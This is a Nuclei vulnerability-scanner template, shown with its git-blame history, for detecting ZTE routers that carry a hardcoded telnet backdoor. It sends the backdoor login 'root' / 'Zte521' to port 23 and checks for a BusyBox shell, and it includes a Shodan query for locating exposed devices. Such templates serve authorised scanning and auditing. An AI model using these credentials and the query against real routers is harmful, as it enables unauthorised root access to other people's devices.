nuclei-templates/network/backdoor/backdoored-zte.yaml

id: backdoored-zte

info:
  name: Backdoored ZTE Routers
  author: its0x08
  severity: high
  description: |
    Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.
  reference:
    - https://www.exploit-db.com/ghdb/7179
  metadata:
    verified: true
    shodan-query: http.html:"ZTE Corporation"
  tags: edb,network,zte,telnet,backdoor,router

network:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:23"

    inputs:
      - data: "root\r\n"
      - data: "Zte521\r\n\r\n"
        read: 1024

    matchers:
      - type: word
        words:
          - "BusyBox"

    extractors:
      - type: regex
        regex:
          - '[A-Z]{1,}[0-9]{3,4}'
Update and rename network/zte-backdoor.yaml to network/backdoor/backdoored-zte.yaml 2022-09-20 18:35:53 +00:00			`id: backdoored-zte`
feat: Added `zte-backdoor` template 2022-09-19 10:47:01 +00:00
			`info:`
Update zte-backdoor.yaml 2022-09-19 11:18:41 +00:00			`name: Backdoored ZTE Routers`
feat: Added `zte-backdoor` template 2022-09-19 10:47:01 +00:00			`author: its0x08`
			`severity: high`
			`description: \|`
			`Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.`
			`reference:`
			`- https://www.exploit-db.com/ghdb/7179`
Update zte-backdoor.yaml 2022-09-19 11:17:21 +00:00			`metadata:`
			`verified: true`
			`shodan-query: http.html:"ZTE Corporation"`
Auto Generated CVE annotations [Tue Sep 20 19:04:49 UTC 2022] :robot: 2022-09-20 19:04:49 +00:00			`tags: edb,network,zte,telnet,backdoor,router`
feat: Added `zte-backdoor` template 2022-09-19 10:47:01 +00:00
			`network:`
			`- host:`
			`- "{{Hostname}}"`
			`- "{{Host}}:23"`

			`inputs:`
			`- data: "root\r\n"`
			`- data: "Zte521\r\n\r\n"`
			`read: 1024`

			`matchers:`
			`- type: word`
			`words:`
			`- "BusyBox"`

			`extractors:`
			`- type: regex`
			`regex:`
			`- '[A-Z]{1,}[0-9]{3,4}'`